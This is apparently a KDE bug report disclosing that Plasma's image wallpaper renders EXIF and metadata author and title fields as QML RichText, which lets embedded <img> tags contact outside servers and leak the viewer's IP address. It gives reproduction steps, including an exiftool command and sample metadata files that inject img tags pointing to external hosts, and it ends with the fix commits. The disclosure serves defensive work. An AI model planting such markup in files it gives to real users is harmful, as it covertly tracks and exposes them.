Created attachment 165086 [details] IP address leak from plasma wallpaper via QML RichText parsing of user-provided text SUMMARY *** exif image information is used by plasma image wallpaper to create a qml richtext string to display author and title of a wallpaper image. the QML richtext can contain <img> tags which point to outside servers. http:// and ftp:// links in the <img> tags are followed to remote addressess AUTHOR & NAME fields in metadata.desktop are also affected, as well as the author & name in metadata.json exploitable EXIF tags: Exif.Image.XPTitle, Exif.Image.DocumentName, Exif.Image.ImageDescription, Exif.Image.Artist, Exif.Image.XPAuthor, Exif.Image.Copyright bugged code is here: https://github.com/KDE/plasma-workspace/blob/master/wallpapers/image/plugin/finder/mediametadatafinder.cpp#L34 *** STEPS TO REPRODUCE EASY: 1. download https://www.deutsche-cyberberatung.de/plasma-shell-wallpaper-ip-address-leak.jpg 2. place file in ~/.local/share/wallpapers/ 3. go on desktop -> right click -> "configure desktop and wallpaper" 4. see that the code is rendered in UI as QML Richtext IMAGE w/ EXIF INFO: 1. take random jpg image 2. run `exiftool -Artist='benjaminflesch<br/><img src="https://www.spyber.com/sig-54300.png"/>' bugme.jpg -overwrite_original_in_place` 3. go on desktop -> right click -> "configure desktop and wallpaper" 4. see that the code is rendered in UI as QML Richtext METADATA.DESKTOP: [Desktop Entry] Name=foobar<img src="https://www.spyber.com/sig-54300.png" /><br/><img src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1> Author=foobar<img src="https://www.spyber.com/sig-54300.png" /><br/><img src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1> METADATA.JSON: { "KPlugin": { "Authors": [ { "Name": "Benjamin Flesch <img src='https://www.spyber.com/sig-54300.png' />", "Email": "bf@deutsche-cyberberatung.de" } ], "Name": "leakmyaddress <img src='https://www.spyber.com/sig-54300.png' />" .... } OBSERVED RESULT html code from exif author field is parsed as QML richtext and allows IP address leak EXPECTED RESULT user-provided exif fields should not be parsed SOFTWARE/OS VERSIONS kdeplasma-addons 5.27.10-2 plasma-browser-integration 5.27.10-1 plasma-desktop 5.27.10-1 plasma-disks 5.27.10-1 plasma-firewall 5.27.10-1 plasma-framework5 5.114.0-1 plasma-integration 5.27.10-1 plasma-meta 5.27-4 plasma-nm 5.27.10-1 plasma-pa 5.27.10-1 plasma-sdk 5.27.10-1 plasma-systemmonitor 5.27.10-1 plasma-thunderbolt 5.27.10-1 plasma-vault 5.27.10-1 plasma-wayland-session 5.27.10-2 plasma-welcome 5.27.10-1 plasma-workspace 5.27.10-2 plasma-workspace-wallpapers 5.27.10-1 plasmatube 23.08.4-1 ADDITIONAL INFORMATION
A possibly relevant merge request was started @ https://invent.kde.org/frameworks/kcmutils/-/merge_requests/197
Git commit be5b413aa6c462173664085934a970eafea7362d by Tobias Fella. Committed on 20/01/2024 at 23:47. Pushed by fusionfuture into branch 'master'. Show GridDelegate labels as plaintext M +2 -0 src/qml/components/GridDelegate.qml https://invent.kde.org/frameworks/kcmutils/-/commit/be5b413aa6c462173664085934a970eafea7362d
Git commit c585d9b98e7eb517f87ac778dd4c284f91429802 by Fushan Wen. Committed on 21/01/2024 at 01:32. Pushed by fusionfuture into branch 'kf5'. Show GridDelegate labels as plaintext (cherry picked from commit be5b413aa6c462173664085934a970eafea7362d) M +4 -2 src/qmlcontrols/kcmcontrols/qml/GridDelegate.qml https://invent.kde.org/frameworks/kdeclarative/-/commit/c585d9b98e7eb517f87ac778dd4c284f91429802